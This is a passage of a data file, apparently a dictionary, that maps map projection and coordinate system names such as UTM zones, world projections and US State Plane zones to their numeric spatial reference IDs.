'WGS_1984_UTM_Zone_18S': 32718, 'WGS_1984_UTM_Zone_19S': 32719, 'WGS_1984_UTM_Zone_20S': 32720, 'WGS_1984_UTM_Zone_21S': 32721, 'WGS_1984_UTM_Zone_22S': 32722, 'WGS_1984_UTM_Zone_23S': 32723, 'WGS_1984_UTM_Zone_24S': 32724, 'WGS_1984_UTM_Zone_25S': 32725, 'WGS_1984_UTM_Zone_26S': 32726, 'WGS_1984_UTM_Zone_27S': 32727, 'WGS_1984_UTM_Zone_28S': 32728, 'WGS_1984_UTM_Zone_29S': 32729, 'WGS_1984_UTM_Zone_30S': 32730, 'WGS_1984_UTM_Zone_31S': 32731, 'WGS_1984_UTM_Zone_32S': 32732, 'WGS_1984_UTM_Zone_33S': 32733, 'WGS_1984_UTM_Zone_34S': 32734, 'WGS_1984_UTM_Zone_35S': 32735, 'WGS_1984_UTM_Zone_36S': 32736, 'WGS_1984_UTM_Zone_37S': 32737, 'WGS_1984_UTM_Zone_38S': 32738, 
'WGS_1984_UTM_Zone_39S': 32739, 'WGS_1984_UTM_Zone_40S': 32740, 'WGS_1984_UTM_Zone_41S': 32741, 'WGS_1984_UTM_Zone_42S': 32742, 'WGS_1984_UTM_Zone_43S': 32743, 'WGS_1984_UTM_Zone_44S': 32744, 'WGS_1984_UTM_Zone_45S': 32745, 'WGS_1984_UTM_Zone_46S': 32746, 'WGS_1984_UTM_Zone_47S': 32747, 'WGS_1984_UTM_Zone_48S': 32748, 'WGS_1984_UTM_Zone_49S': 32749, 'WGS_1984_UTM_Zone_50S': 32750, 'WGS_1984_UTM_Zone_51S': 32751, 'WGS_1984_UTM_Zone_52S': 32752, 'WGS_1984_UTM_Zone_53S': 32753, 'WGS_1984_UTM_Zone_54S': 32754, 'WGS_1984_UTM_Zone_55S': 32755, 'WGS_1984_UTM_Zone_56S': 32756, 'WGS_1984_UTM_Zone_57S': 32757, 'WGS_1984_UTM_Zone_58S': 32758, 'WGS_1984_UTM_Zone_59S': 32759, 'WGS_1984_UTM_Zone_60S': 32760, 'UPS_South': 32761, 'WGS_1984_TM_36_SE': 32766, 'Sphere_Plate_Carree': 53001, 'Sphere_Equidistant_Cylindrical': 53002, 'Sphere_Miller_Cylindrical': 53003, 'Sphere_Mercator': 53004, 'Sphere_Sinusoidal': 53008, 'Sphere_Mollweide': 53009, 'Sphere_Eckert_VI': 53010, 'Sphere_Eckert_V': 53011, 'Sphere_Eckert_IV': 53012, 'Sphere_Eckert_III': 53013, 'Sphere_Eckert_II': 53014, 'Sphere_Eckert_I': 53015, 'Sphere_Gall_Stereographic': 53016, 'Sphere_Behrmann': 53017, 'Sphere_Winkel_I': 53018, 'Sphere_Winkel_II': 53019, 'Sphere_Polyconic': 53021, 'Sphere_Quartic_Authalic': 53022, 'Sphere_Loximuthal': 53023, 'Sphere_Bonne': 53024, 'Sphere_Hotine': 53025, 'Sphere_Stereographic': 53026, 'Sphere_Equidistant_Conic': 53027, 'Sphere_Cassini': 53028, 'Sphere_Van_der_Grinten_I': 53029, 'Sphere_Robinson': 53030, 'Sphere_Two_Point_Equidistant': 53031, 'Sphere_Azimuthal_Equidistant': 53032, 'Sphere_Cylindrical_Equal_Area': 53034, 'Sphere_Winkel_Tripel_NGS': 53042, 'Sphere_Aitoff': 53043, 'Sphere_Hammer_Aitoff': 53044, 'Sphere_Flat_Polar_Quartic': 53045, 'Sphere_Craster_Parabolic': 53046, 'Sphere_Times': 53048, 'Sphere_Vertical_Perspective': 53049, 'World_Plate_Carree': 54001, 'World_Equidistant_Cylindrical': 54002, 'World_Miller_Cylindrical': 54003, 'World_Mercator': 54004, 'World_Sinusoidal': 54008, 
'World_Mollweide': 54009, 'World_Eckert_VI': 54010, 'World_Eckert_V': 54011, 'World_Eckert_IV': 54012, 'World_Eckert_III': 54013, 'World_Eckert_II': 54014, 'World_Eckert_I': 54015, 'World_Gall_Stereographic': 54016, 'World_Behrmann': 54017, 'World_Winkel_I': 54018, 'World_Winkel_II': 54019, 'World_Polyconic': 54021, 'World_Quartic_Authalic': 54022, 'World_Loximuthal': 54023, 'World_Bonne': 54024, 'World_Hotine': 54025, 'World_Stereographic': 54026, 'World_Equidistant_Conic': 54027, 'World_Cassini': 54028, 'World_Van_der_Grinten_I': 54029, 'World_Robinson': 54030, 'World_Two_Point_Equidistant': 54031, 'World_Azimuthal_Equidistant': 54032, 'World_Cylindrical_Equal_Area': 54034, 'World_Winkel_Tripel_NGS': 54042, 'World_Aitoff': 54043, 'World_Hammer_Aitoff': 54044, 'World_Flat_Polar_Quartic': 54045, 'World_Craster_Parabolic': 54046, 'World_Times': 54048, 'World_Vertical_Perspective': 54049, 'World_Fuller': 54050, 'World_Cube': 54051, 'World_Goode_Homolosine_Land': 54052, 'World_Goode_Homolosine_Ocean': 54053, 'NAD_1927_StatePlane_Guam_FIPS_5400': 65061, 'American_Samoa_1962_StatePlane_American_Samoa_FIPS_5300': 65062, 'NAD_1983_StatePlane_Guam_FIPS_5400': 65161, 'NAD_1983_StatePlane_Kentucky_FIPS_1600': 65163, 'Canada_Albers_Equal_Area_Conic': 102001, 'Canada_Lambert_Conformal_Conic': 102002, 'USA_Contiguous_Albers_Equal_Area_Conic': 102003, 'USA_Contiguous_Lambert_Conformal_Conic': 102004, 'USA_Contiguous_Equidistant_Conic': 102005, 'NAD_1983_Alaska_Albers': 102006, 'Hawaii_Albers_Equal_Area_Conic': 102007, 'North_America_Albers_Equal_Area_Conic': 102008, 'North_America_Lambert_Conformal_Conic': 102009, 'North_America_Equidistant_Conic': 102010, 'Africa_Sinusoidal': 102011, 'Asia_Lambert_Conformal_Conic': 102012, 'Europe_Albers_Equal_Area_Conic': 102013, 'Europe_Lambert_Conformal_Conic': 102014, 'South_America_Lambert_Conformal_Conic': 102015, 'North_Pole_Azimuthal_Equidistant': 102016, 'North_Pole_Lambert_Azimuthal_Equal_Area': 102017, 'North_Pole_Stereographic': 
102018, 'South_Pole_Azimuthal_Equidistant': 102019, 'South_Pole_Lambert_Azimuthal_Equal_Area': 102020, 'South_Pole_Stereographic': 102021, 'Africa_Albers_Equal_Area_Conic': 102022, 'Africa_Equidistant_Conic': 102023, 'Africa_Lambert_Conformal_Conic': 102024, 'Asia_North_Albers_Equal_Area_Conic': 102025, 'Asia_North_Equidistant_Conic': 102026, 'Asia_North_Lambert_Conformal_Conic': 102027, 'Asia_South_Albers_Equal_Area_Conic': 102028, 'Asia_South_Equidistant_Conic': 102029, 'Asia_South_Lambert_Conformal_Conic': 102030, 'Europe_Equidistant_Conic': 102031, 'South_America_Equidistant_Conic': 102032, 'South_America_Albers_Equal_Area_Conic': 102033, 'North_Pole_Gnomonic': 102034, 'North_Pole_Orthographic': 102035, 'South_Pole_Gnomonic': 102036, 'South_Pole_Orthographic': 102037, 'The_World_From_Space': 102038, 'USA_Contiguous_Albers_Equal_Area_Conic_USGS_version': 102039, 'D48_Slovenia_TM': 102060, 'Everest_Modified_1969_RSO_Malaya_Meters': 102061, 'Kertau_RSO_Malaya_Meters': 102062, 'Kandawala_Ceylon_Belt_Meters': 102063, 'Kandawala_Ceylon_Belt_Indian_Yards_1937': 102064, 'S-JTSK_Krovak': 102065, 'S-JTSK_Ferro_Krovak_East_North': 102066, 'S-JTSK_Krovak_East_North': 102067, 'EMEP_50_Kilometer_Grid': 102068, 'EMEP_150_Kilometer_Grid': 102069, 'Guernsey_Grid': 102070, 'AGD_1966_ACT_Grid_AGC_Zone': 102071, 'AGD_1966_ISG_54_2': 102072, 'AGD_1966_ISG_54_3': 102073, 'AGD_1966_ISG_55_1': 102074, 'AGD_1966_ISG_55_2': 102075, 'AGD_1966_ISG_55_3': 102076, 'AGD_1966_ISG_56_1': 102077, 'AGD_1966_ISG_56_2': 102078, 'AGD_1966_ISG_56_3': 102079, 'Bermuda_2000_National_Grid': 102090, 'Monte_Mario_Italy_1': 102091, 'Monte_Mario_Italy_2': 102092, 'Roma_1940_Gauss_Boaga_Est': 102093, 'Roma_1940_Gauss_Boaga_Ovest': 102094, 'JAD_2001_Jamaica_Grid': 102095, 'Bab_South_Palau_Azimuthal_Equidistant': 102096, 'ETRS_1989_UTM_Zone_26N': 102097, 'ETRS_1989_UTM_Zone_27N': 102098, 'ETRS_1989_UTM_Zone_39N': 102099, 'WGS_1984_Web_Mercator_Auxiliary_Sphere': 102100, 'NGO_1948_Norway_Zone_1': 102101, 
'NGO_1948_Norway_Zone_2': 102102, 'NGO_1948_Norway_Zone_3': 102103, 'NGO_1948_Norway_Zone_4': 102104, 'NGO_1948_Norway_Zone_5': 102105, 'NGO_1948_Norway_Zone_6': 102106, 'NGO_1948_Norway_Zone_7': 102107, 'NGO_1948_Norway_Zone_8': 102108, 'ETRS_1989_Slovenia_TM': 102109, 'RGF_1993_Lambert_93': 102110, 'Chatham_Islands_1979_Map_Grid': 102111, 'NZGD_2000_Chatham_Island_Circuit': 102112, 'WGS_1984_Web_Mercator': 102113, 'Old_Hawaiian_UTM_Zone_4N': 102114, 'Old_Hawaiian_UTM_Zone_5N': 102115, 'American_Samoa_1962_UTM_Zone_2S': 102116, 'NAD_1927_Alaska_Albers_Meters': 102117, 'NAD_1927_Georgia_Statewide_Albers': 102118, 'NAD_1927_Texas_Statewide_Mapping_System': 102119, 'NAD_1927_Michigan_GeoRef_Feet_US': 102120, 'NAD_1983_Michigan_GeoRef_Feet_US': 102121, 'NAD_1927_Michigan_GeoRef_Meters': 102122, 'NAD_1983_Michigan_GeoRef_Meters': 102123, 'NAD_1927_UTM_Zone_1N': 102124, 'NAD_1927_UTM_Zone_2N': 102125, 'NAD_1927_UTM_Zone_59N': 102126, 'NAD_1927_UTM_Zone_60N': 102127, 'NAD_1983_UTM_Zone_1N': 102128, 'NAD_1983_UTM_Zone_2N': 102129, 'NAD_1983_UTM_Zone_59N': 102130, 'NAD_1983_UTM_Zone_60N': 102131, 'NGO_1948_UTM_Zone_32N': 102132, 'NGO_1948_UTM_Zone_33N': 102133, 'NGO_1948_UTM_Zone_34N': 102134, 'NGO_1948_UTM_Zone_35N': 102135, 'NGO_1948_Baerum_Kommune': 102136, 'NGO_1948_Bergenhalvoen': 102137, 'NGO_1948_Oslo_Kommune': 102138, 'EUREF_FIN_TM35FIN': 102139, 'Hong_Kong_1980_Grid': 102140, 'Hong_Kong_1980_UTM_Zone_49N': 102141, 'Hong_Kong_1980_UTM_Zone_50N': 102142, 'QND_1995_UTM_39N': 102143, 'Merchich_Degree_UTM_Zone_28N': 102144, 'JGD_2000_UTM_Zone_51N': 102145, 'JGD_2000_UTM_Zone_52N': 102146, 'JGD_2000_UTM_Zone_53N': 102147, 'JGD_2000_UTM_Zone_54N': 102148, 'JGD_2000_UTM_Zone_55N': 102149, 'JGD_2000_UTM_Zone_56N': 102150, 'Tokyo_UTM_Zone_51N': 102151, 'Tokyo_UTM_Zone_52N': 102152, 'Tokyo_UTM_Zone_53N': 102153, 'Tokyo_UTM_Zone_54N': 102154, 'Tokyo_UTM_Zone_55N': 102155, 'Tokyo_UTM_Zone_56N': 102156, 'ETRS_1989_Kosovo_Grid': 102157, 'Jordan_JTM': 102158, 
'Observatorio_Meteorologico_1965_Macau_Grid': 102159, 'Datum_73_Hayford_Gauss_IGeoE': 102160, 'Datum_73_Hayford_Gauss_IPCC': 102161, 'Graciosa_Base_SW_1948_UTM_Zone_26N': 102162, 'Lisboa_Bessel_Bonne': 102163, 'Lisboa_Hayford_Gauss_IGeoE': 102164, 'Lisboa_Hayford_Gauss_IPCC': 102165, 'Observ_Meteorologico_1939_UTM_Zone_25N': 102166, 'Porto_Santo_1936_UTM_Zone_28N': 102167, 'Sao_Braz_UTM_Zone_26N': 102168, 'Selvagem_Grande_1938_UTM_Zone_28N': 102169, 'AGD_1966_VICGRID': 102170, 'GDA_1994_VICGRID94': 102171, 'GDA_1994_South_Australia_Lambert': 102172, 'ETRS_1989_UWPP_1992': 102173, 'ETRS_1989_UWPP_2000_PAS_5': 102174, 'ETRS_1989_UWPP_2000_PAS_6': 102175, 'ETRS_1989_UWPP_2000_PAS_7': 102176, 'ETRS_1989_UWPP_2000_PAS_8': 102177, 'NAD_1927_10TM_AEP_Forest': 102178, 'NAD_1927_10TM_AEP_Resource': 102179, 'NAD_1927_3TM_111': 102180, 'NAD_1927_3TM_114': 102181, 'NAD_1927_3TM_117': 102182, 'NAD_1927_3TM_120': 102183, 'NAD_1983_10TM_AEP_Forest': 102184, 'NAD_1983_10TM_AEP_Resource': 102185, 'NAD_1983_3TM_111': 102186, 'NAD_1983_3TM_114': 102187, 'NAD_1983_3TM_117': 102188, 'NAD_1983_3TM_120': 102189, 'NAD_1983_BC_Environment_Albers': 102190, 'Nord_Maroc_Degree': 102191, 'Sud_Maroc_Degree': 102192, 'Sahara_Degree': 102193, 'UWPP_1992': 102194, 'UWPP_2000_PAS_5': 102195, 'UWPP_2000_PAS_6': 102196, 'UWPP_2000_PAS_7': 102197, 'UWPP_2000_PAS_8': 102198, 'Belge_Lambert_2008': 102199, 'NAD_1983_HARN_UTM_Zone_2S': 102200, 'NAD_1983_HARN_Guam_Map_Grid': 102201, 'NAD_1983_HARN_UTM_Zone_4N': 102202, 'NAD_1983_HARN_UTM_Zone_5N': 102203, 'NAD_1983_HARN_UTM_Zone_11N': 102205, 'NAD_1983_HARN_UTM_Zone_12N': 102206, 'NAD_1983_HARN_UTM_Zone_13N': 102207, 'NAD_1983_HARN_Maine_2000_East_Zone': 102208, 'NAD_1983_HARN_Maine_2000_Central_Zone': 102209, 'NAD_1983_HARN_Maine_2000_West_Zone': 102210, 'NAD_1983_HARN_UTM_Zone_18N': 102211, 'NAD_1983_USFS_R6_Albers': 102218, 'NAD_1983_Wisconsin_TM_US_Ft': 102219, 'NAD_1983_HARN_Wisconsin_TM_US_Ft': 102220, 'Ocotepeque_1935_Costa_Rica_Lambert_Norte': 
102221, 'Ocotepeque_1935_Costa_Rica_Lambert_Sur': 102222, 'WGS_1984_Costa_Rica_TM_90': 102223, 'MONREF_1997_UTM_Zone_46N': 102224, 'MONREF_1997_UTM_Zone_47N': 102225, 'MONREF_1997_UTM_Zone_48N': 102226, 'MONREF_1997_UTM_Zone_49N': 102227, 'MONREF_1997_UTM_Zone_50N': 102228, 'NAD_1983_HARN_StatePlane_Alabama_East_FIPS_0101': 102229, 'NAD_1983_HARN_StatePlane_Alabama_West_FIPS_0102': 102230, 'Colombia_West_West_Zone': 102231, 'Bogota_Ciudad_Bogota': 102232, 'MAGNA_Ciudad_Bogota': 102233, 'NAD_1983_CSRS_UTM_Zone_14N': 102234, 'NAD_1983_CSRS_UTM_Zone_15N': 102235, 'NAD_1983_CSRS_UTM_Zone_16N': 102236, 'Pohnpei_Az_Eq_1971': 102237, 'Saipan_Az_Eq_1969': 102238, 'Guam_Geodetic_Triangulation_Network_1963': 102239, 'Guam_Geodetic_Network_1993': 102240, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401': 102241, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402': 102242, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403': 102243, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404': 102244, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405': 102245, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406': 102246, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201': 102248, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202': 102249, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203': 102250, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301': 102251, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302': 102252, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501': 102253, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502': 102254, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503': 102255, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600': 102256, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700': 102257, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901': 102258, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902': 102259, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903': 102260, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101': 102261, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102': 
102262, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103': 102263, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104': 102264, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105': 102265, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001': 102266, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002': 102267, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101': 102268, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102': 102269, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103': 102270, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201': 102271, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202': 102272, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301': 102273, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302': 102274, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401': 102275, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402': 102276, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501': 102277, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502': 102278, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601': 102279, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602': 102280, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701': 102281, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702': 102282, 'NAD_1983_HARN_StatePlane_Maine_East_FIPS_1801': 102283, 'NAD_1983_HARN_StatePlane_Maine_West_FIPS_1802': 102284, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900': 102285, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001': 102286, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002': 102287, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111': 102288, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112': 102289, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113': 102290, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201': 102291, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202': 102292, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203': 102293, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301': 102294, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302': 102295, 
'NAD_1983_HARN_StatePlane_Missouri_East_FIPS_2401': 102296, 'NAD_1983_HARN_StatePlane_Missouri_Central_FIPS_2402': 102297, 'NAD_1983_HARN_StatePlane_Missouri_West_FIPS_2403': 102298, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500': 102300, 'NAD_1983_HARN_StatePlane_Nebraska_FIPS_2600': 102304, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701': 102307, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702': 102308, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703': 102309, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800': 102310, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900': 102311, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001': 102312, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002': 102313, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003': 102314, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101': 102315, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102': 102316, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103': 102317, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104': 102318, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301': 102320, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302': 102321, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401': 102322, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402': 102323, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501': 102324, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502': 102325, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601': 102326, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602': 102327, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800': 102330, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001': 102334, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002': 102335, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100': 102336, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201': 102337, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202': 102338, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203': 102339, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204': 
102340, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205': 102341, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301': 102342, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302': 102343, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303': 102344, 'NAD_1983_HARN_StatePlane_Vermont_FIPS_4400': 102345, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501': 102346, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502': 102347, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601': 102348, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602': 102349, 'NAD_1983_HARN_StatePlane_West_Virginia_North_FIPS_4701': 102350, 'NAD_1983_HARN_StatePlane_West_Virginia_South_FIPS_4702': 102351, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801': 102352, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802': 102353, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803': 102354, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901': 102355, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902': 102356, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903': 102357, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904': 102358, 'NAD_1983_HARN_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 102361, 'NAD_1983_HARN_StatePlane_Kentucky_FIPS_1600': 102363, 'WGS_1984_ARC_System_Zone_01': 102421, 'WGS_1984_ARC_System_Zone_02': 102422, 'WGS_1984_ARC_System_Zone_03': 102423, 'WGS_1984_ARC_System_Zone_04': 102424, 'WGS_1984_ARC_System_Zone_05': 102425, 'WGS_1984_ARC_System_Zone_06': 102426, 'WGS_1984_ARC_System_Zone_07': 102427, 'WGS_1984_ARC_System_Zone_08': 102428, 'WGS_1984_ARC_System_Zone_09': 102429, 'WGS_1984_ARC_System_Zone_10': 102430, 'WGS_1984_ARC_System_Zone_11': 102431, 'WGS_1984_ARC_System_Zone_12': 102432, 'WGS_1984_ARC_System_Zone_13': 102433, 'WGS_1984_ARC_System_Zone_14': 102434, 'WGS_1984_ARC_System_Zone_15': 102435, 'WGS_1984_ARC_System_Zone_16': 102436, 'WGS_1984_ARC_System_Zone_17': 102437, 'WGS_1984_ARC_System_Zone_18': 102438, 'LKS_1992_Latvia_TM_0': 102440, 'TWD_1967_TM_Taiwan': 
102441, 'TWD_1967_TM_Penghu': 102442, 'TWD_1997_TM_Taiwan': 102443, 'TWD_1997_TM_Penghu': 102444, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101_Feet': 102461, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102_Feet': 102462, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103_Feet': 102463, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104_Feet': 102464, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105_Feet': 102465, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201_Feet': 102466, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202_Feet': 102467, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203_Feet': 102468, 'NAD_1983_HARN_Mississippi_TM': 102469, 'Nord_Algerie_Ancienne_Degree': 102491, 'Sud_Algerie_Ancienne_Degree': 102492, 'WGS_1984_Complex_UTM_Zone_20N': 102570, 'WGS_1984_Complex_UTM_Zone_21N': 102571, 'WGS_1984_Complex_UTM_Zone_22N': 102572, 'WGS_1984_Complex_UTM_Zone_23N': 102573, 'WGS_1984_Complex_UTM_Zone_24N': 102574, 'WGS_1984_Complex_UTM_Zone_25N': 102575, 'WGS_1984_Complex_UTM_Zone_26N': 102576, 'WGS_1984_Complex_UTM_Zone_27N': 102577, 'WGS_1984_Complex_UTM_Zone_28N': 102578, 'WGS_1984_Complex_UTM_Zone_29N': 102579, 'WGS_1984_Complex_UTM_Zone_30N': 102580, 'NTF_France_I_degrees': 102581, 'NTF_France_II_degrees': 102582, 'NTF_France_III_degrees': 102583, 'NTF_France_IV_degrees': 102584, 'Nord_Algerie_Degree': 102591, 'Sud_Algerie_Degree': 102592, 'NAD_1983_Texas_Centric_Mapping_System_Albers': 102601, 'NAD_1983_Texas_Centric_Mapping_System_Lambert': 102602, 'NAD_1983_Texas_Statewide_Mapping_System': 102603, 'NAD_1983_Georgia_Statewide_Lambert': 102604, 'NAD_1983_Idaho_TM': 102605, 'NAD_1983_Maine_2000_East_Zone': 102606, 'NAD_1983_Maine_2000_Central_Zone': 102607, 'NAD_1983_Maine_2000_West_Zone': 102608, 'NAD_1983_Mississippi_TM': 102609, 'NAD_1983_StatePlane_Alabama_East_FIPS_0101_Feet': 102629, 'NAD_1983_StatePlane_Alabama_West_FIPS_0102_Feet': 102630, 'NAD_1983_StatePlane_Alaska_1_FIPS_5001_Feet': 102631, 'NAD_1983_StatePlane_Alaska_2_FIPS_5002_Feet': 102632, 
'NAD_1983_StatePlane_Alaska_3_FIPS_5003_Feet': 102633, 'NAD_1983_StatePlane_Alaska_4_FIPS_5004_Feet': 102634, 'NAD_1983_StatePlane_Alaska_5_FIPS_5005_Feet': 102635, 'NAD_1983_StatePlane_Alaska_6_FIPS_5006_Feet': 102636, 'NAD_1983_StatePlane_Alaska_7_FIPS_5007_Feet': 102637, 'NAD_1983_StatePlane_Alaska_8_FIPS_5008_Feet': 102638, 'NAD_1983_StatePlane_Alaska_9_FIPS_5009_Feet': 102639, 'NAD_1983_StatePlane_Alaska_10_FIPS_5010_Feet': 102640, 'NAD_1983_StatePlane_California_I_FIPS_0401_Feet': 102641, 'NAD_1983_StatePlane_California_II_FIPS_0402_Feet': 102642, 'NAD_1983_StatePlane_California_III_FIPS_0403_Feet': 102643, 'NAD_1983_StatePlane_California_IV_FIPS_0404_Feet': 102644, 'NAD_1983_StatePlane_California_V_FIPS_0405_Feet': 102645, 'NAD_1983_StatePlane_California_VI_FIPS_0406_Feet': 102646, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201_Feet': 102648, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202_Feet': 102649, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203_Feet': 102650, 'NAD_1983_StatePlane_Arkansas_North_FIPS_0301_Feet': 102651, 'NAD_1983_StatePlane_Arkansas_South_FIPS_0302_Feet': 102652, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501_Feet': 102653, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502_Feet': 102654, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503_Feet': 102655, 'NAD_1983_StatePlane_Connecticut_FIPS_0600_Feet': 102656, 'NAD_1983_StatePlane_Delaware_FIPS_0700_Feet': 102657, 'NAD_1983_StatePlane_Florida_East_FIPS_0901_Feet': 102658, 'NAD_1983_StatePlane_Florida_West_FIPS_0902_Feet': 102659, 'NAD_1983_StatePlane_Florida_North_FIPS_0903_Feet': 102660, 'NAD_1983_StatePlane_Hawaii_1_FIPS_5101_Feet': 102661, 'NAD_1983_StatePlane_Hawaii_2_FIPS_5102_Feet': 102662, 'NAD_1983_StatePlane_Hawaii_3_FIPS_5103_Feet': 102663, 'NAD_1983_StatePlane_Hawaii_4_FIPS_5104_Feet': 102664, 'NAD_1983_StatePlane_Hawaii_5_FIPS_5105_Feet': 102665, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001_Feet': 102666, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002_Feet': 102667, 
